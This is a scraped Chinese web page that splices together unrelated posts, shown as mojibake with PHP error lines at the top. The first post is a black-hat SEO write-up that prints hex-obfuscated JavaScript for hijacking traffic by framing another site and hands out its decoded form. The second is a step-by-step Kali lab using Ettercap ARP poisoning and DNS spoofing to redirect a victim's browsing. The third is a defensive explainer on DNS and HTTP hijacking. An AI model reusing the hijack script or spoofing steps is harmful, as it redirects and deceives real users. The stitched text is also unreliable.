Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537
說到黑帽什么的你們就非常的感興趣,那也沒辦法,畢竟黑帽神秘又厲害,一周就有效果。
有關(guān)黑帽的具體操作網(wǎng)上少之又少,基本都標(biāo)題黨。
剛好最近碰到一個(gè)群友在吹他的快排,就拿他的來做個(gè)講解。
我看了他的網(wǎng)站,就只能看出JS劫持,其他我也不懂,就講講這個(gè)吧。
暫時(shí)他有三個(gè)網(wǎng)站,指數(shù)5000左右的詞都排首頁前5位,大家先看看數(shù)據(jù)(提醒:拿別人的網(wǎng)站來分析,切勿放上網(wǎng)址及網(wǎng)站信息,斷人財(cái)路等于殺人放火)
短時(shí)間內(nèi)有這樣的數(shù)據(jù),50%做了快排。
這樣看快排的幾率90%了
這里提醒下各位站長,快排來得快去得也快,這是鐵律。能給你幾個(gè)月的快感,百度一更新就難翻身,切記切記。
但我個(gè)人比較向往黑帽,因?yàn)閰柡Π ?/p>
看了他的網(wǎng)站代碼,里面都有一個(gè)奇怪的JS代碼
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65 \x3d
\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3e");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']
("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\"\x3c\x66\x72\x61\x6d\x65\x73\x65\x74 \x72\x6f\x77\x73\x3d\x27\x31\x30\x30\x25\x2c\x2a\x27
\x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x4e\x4f\x27 \x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27
\x66\x72\x61\x6d\x65\x73\x70\x61\x63\x69\x6e\x67\x3d\x27\x30\x27\x3e\"\x29\x3b");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']
("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\"\x3c\x66\x72\x61\x6d\x65 \x6e\x61\x6d\x65\x3d\x27\x6d\x61\x69\x6e\x27
\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\u4f60\u7684\u7f51\u5740\x2e\x63\x6f\x6d\x27
\x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\x79\x65\x73\x3e\"\x29\x3b");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']
('\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x2f\x66\x72\x61\x6d\x65\x73\x65\x74\x3e\x22\x29\x3b');window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
['\x77\x72\x69\x74\x65\x6c\x6e']("\x\x33\x63\x2f\x73\x63\x72\x69\x70\x74\x3e");
是不是很奇怪
其實(shí)這個(gè)是經(jīng)過加密的JS劫持代碼,經(jīng)常會(huì)出現(xiàn)在被黑的網(wǎng)站里面,劫持流量。
解密后發(fā)現(xiàn)都是指向一個(gè)網(wǎng)站,我們再看看那個(gè)網(wǎng)站的數(shù)據(jù)
能肯定這個(gè)估計(jì)就是主站了,手法就是通過快排一些網(wǎng)站上排位然后JS劫持流量到主站做排名。
那肯定你們會(huì)問,為什么這么大費(fèi)周章不直接就去快排主站算了。
因?yàn)橹髡静荒鼙籏,而快排站無所謂,說明一下,百度蜘蛛現(xiàn)在是不能識(shí)別JS代碼的,一旦懲罰,主站不會(huì)被牽連,
而且這位朋友手法成熟,快排站與主站做的行業(yè)和關(guān)鍵詞都一致,一旦跳轉(zhuǎn),主站的流量來源都會(huì)是行業(yè)關(guān)鍵詞,想法很好。
好了,點(diǎn)到為止,希望能給你們一點(diǎn)幫助,最后奉上JS代碼。
document.writeln("<script language = javascript>");
document.writeln("document.write(\"<frameset rows='100%,*' frameborder='NO' border='0' framespacing='0'>\");");
document.writeln("document.write(\"<frame name='main' src='http://www.你的網(wǎng)址.com' scrolling=yes>\");");
document.writeln('document.write("</frameset>");');
document.writeln("\x3c/script>");
熱點(diǎn)資訊
SEO基本功:站內(nèi)優(yōu)化的一些基本手段
SEO進(jìn)階必修課:如何創(chuàng)建和管理高質(zhì)量關(guān)鍵詞詞庫
春風(fēng)十里,不如你
內(nèi)容純屬技術(shù)記錄,切勿用來做違法事情
受害方:win 10
攻擊方:kali linux
win 10:10.1.1.20
kali linux:10.1.1.128
網(wǎng)關(guān):10.1.1.1
兩臺(tái)電腦第一次聯(lián)系時(shí),
第一臺(tái)會(huì)通過ARP廣播的形式來獲取對方mac地址
第二臺(tái)收到第一臺(tái)的ARP廣播報(bào)文后通過解析再單播應(yīng)答回去
至此,兩臺(tái)電腦成功建立聯(lián)系;
假設(shè)有第三臺(tái)電腦獲得第一個(gè)ARP廣播報(bào)文的內(nèi)容后,
多次向報(bào)文中的源ip單播應(yīng)答
則第一臺(tái)將會(huì)把第三臺(tái)電腦誤認(rèn)為是第二臺(tái)電腦
至此,攻擊成功。
首先準(zhǔn)備好一個(gè)網(wǎng)頁,如下
將該網(wǎng)頁放到如下位置
/var/www/html/
并改名為index.html
啟動(dòng)apache服務(wù)
systemctl start apache2
打開瀏覽器,檢查網(wǎng)頁是否正常運(yùn)行
打開Ettercap的配置文件
leafpad /etc/ettercap/etter.dns
在最后面加上下面這行,保存退出
*.com A 10.1.1.128
到了這里,準(zhǔn)備工作都差不多搞定了
接下來,ping下win 10,可以ping通
打開Ettercap工具
ettercap -G
確定網(wǎng)卡是自己的eth0后,點(diǎn)擊右上方的勾
接著,先停掉這個(gè)工具的運(yùn)行,點(diǎn)擊放大鏡的圖標(biāo)
再點(diǎn)擊下上面紅色框的圖標(biāo),就能發(fā)現(xiàn)win 10以及網(wǎng)關(guān)的ip
把網(wǎng)關(guān)ip給Target1,把win 10的ip給Target2
接著,選擇框中的圖標(biāo),點(diǎn)ARP poisoning選項(xiàng)
彈出來的界面全部勾上
點(diǎn)擊省略號(hào)---Plugins---Manage plugins
雙擊dns_spoof
這時(shí)候,就可以發(fā)動(dòng)攻擊了
win10用瀏覽器訪問百度,劫持成功!
訪問一個(gè)不存在的網(wǎng)站測試,劫持成功
再看后臺(tái),訪問記錄統(tǒng)統(tǒng)捕獲
也就是說,不管現(xiàn)在這臺(tái)win10訪問什么網(wǎng)站都好,都只會(huì)訪問到部署好的頁面
是英俊瀟灑,技術(shù)過硬的網(wǎng)盾運(yùn)維攻城獅龜哥。
今天來跟大家聊一聊下載劫持,劫持主要分類兩大類:DNS劫持和HTTP劫持。而HTTP劫持最常見的就是3XX跳轉(zhuǎn)劫持,JS劫持以及HTML劫持。
眾所周知,CDN的全稱是Content Delivery Network,即內(nèi)容分發(fā)網(wǎng)絡(luò),主要是提高網(wǎng)站的速度,可以優(yōu)化網(wǎng)站的訪問速度,提高網(wǎng)站的安全性和穩(wěn)定性。
什么你只知道CDN能加速?那么CDN本身是一種DNS劫持你知道嗎?不過放心,它是良性的,不同于黑客強(qiáng)制DNS把域名解析到自己的釣魚IP上,CDN是讓DNS主動(dòng)配合,把域名解析到臨近的服務(wù)器上。
同時(shí)服務(wù)器開啟HTTP代理,讓用戶感覺不到CDN的存在。而且CDN劫持不像海王那樣不挑食,劫持用戶所有流量。CDN比較專一只“劫持”用戶的靜態(tài)資源訪問,對于之前用戶訪問過的資源,CDN將直接從本地緩存里反饋給用戶,因此速度有了很大的提升。
DNS劫持
正常DNS解析的流程是用戶走localdns,通過運(yùn)營商提供的遞歸DNS進(jìn)行域名解析。而DNS劫持一般發(fā)生在LDNS(遞歸dns)這一層。
DNS劫持有這三種情況:
1.錯(cuò)誤域名解析到糾錯(cuò)導(dǎo)航頁面,導(dǎo)航頁面存在廣告;
2.錯(cuò)誤域名解析到非正常頁面 ;
3.直接將特點(diǎn)站點(diǎn)解析到惡意或者廣告頁面 。
HTTP劫持
HTTP劫持是指在傳輸過程中,劫持方偽裝成目的服務(wù)器搶先給出了響應(yīng),使得客戶端接受了劫持的響應(yīng)而拋棄了正確的響應(yīng),就是先下手為強(qiáng),后下手遭殃。甚至有時(shí)候劫持方會(huì)完全攔截用戶的請求,目的服務(wù)器沒有接受到任何請求。
在HTTP劫持中,3XX跳轉(zhuǎn),JS內(nèi)容篡改以及html內(nèi)容篡改都可能會(huì)發(fā)生。目前看3XX跳轉(zhuǎn)和JS內(nèi)容篡改比較常見。
劫持方想要達(dá)成的目的是默默的賺錢,因此這就決定了劫持方不可能猖獗到劫持整個(gè)域名的http請求。一般是通過過濾識(shí)別http請求的特征碼來判斷是否要進(jìn)行劫持。
那么我們有兩種防劫持思路
1.采用https協(xié)議加密請求。
2.隱藏http請求的特征,例如使用對稱加密算法加密整個(gè)url。
https可以說是防止劫持的終極思路,但是https多了ssl握手的過程,會(huì)耗費(fèi)一定的時(shí)間和性能,必須要考慮到時(shí)間影響和CDN節(jié)點(diǎn)的性能影響。另外https一般分為兩種,一種是傳統(tǒng)https(合用證書),一種是https sni。
目前的主流是https sni,但選用的時(shí)候必須確認(rèn)好具體的業(yè)務(wù)需求,因?yàn)槭忻嫔线€殘留著一些老舊版本的瀏覽器。
URL加密也是經(jīng)常用來防止劫持的做法。市面上的各大手機(jī)應(yīng)用商店都采用了這種做法。相較于https,url加密的兼容性更好,并且對CDN節(jié)點(diǎn)帶來的解密額外負(fù)擔(dān)可以忽略,但是url加密需要CDN節(jié)點(diǎn)的密切配合。
通常是選中一種對稱加密算法,調(diào)用加密后的url。用戶向CDN節(jié)點(diǎn)發(fā)起請求,CDN節(jié)點(diǎn)會(huì)解密url,獲取真實(shí)的url并且響應(yīng)給用戶。
由于劫持方一般通過對url進(jìn)行匹配決定是否進(jìn)行劫持,因此這種url加密的方式也可以很好的防止劫持。
通俗的來講,DNS劫持就是你想去存錢運(yùn)營商卻把你拉到了劫匪手中;而HTTP劫持就是你從服務(wù)器買了一份飯電信給你放了一坨屎。
過以上的內(nèi)容,相信機(jī)智的網(wǎng)友們已經(jīng)知道了什么是DNS劫持和HTTP劫持以及應(yīng)對方法,如果還有什么疑問歡迎來撩龜哥~
*請認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。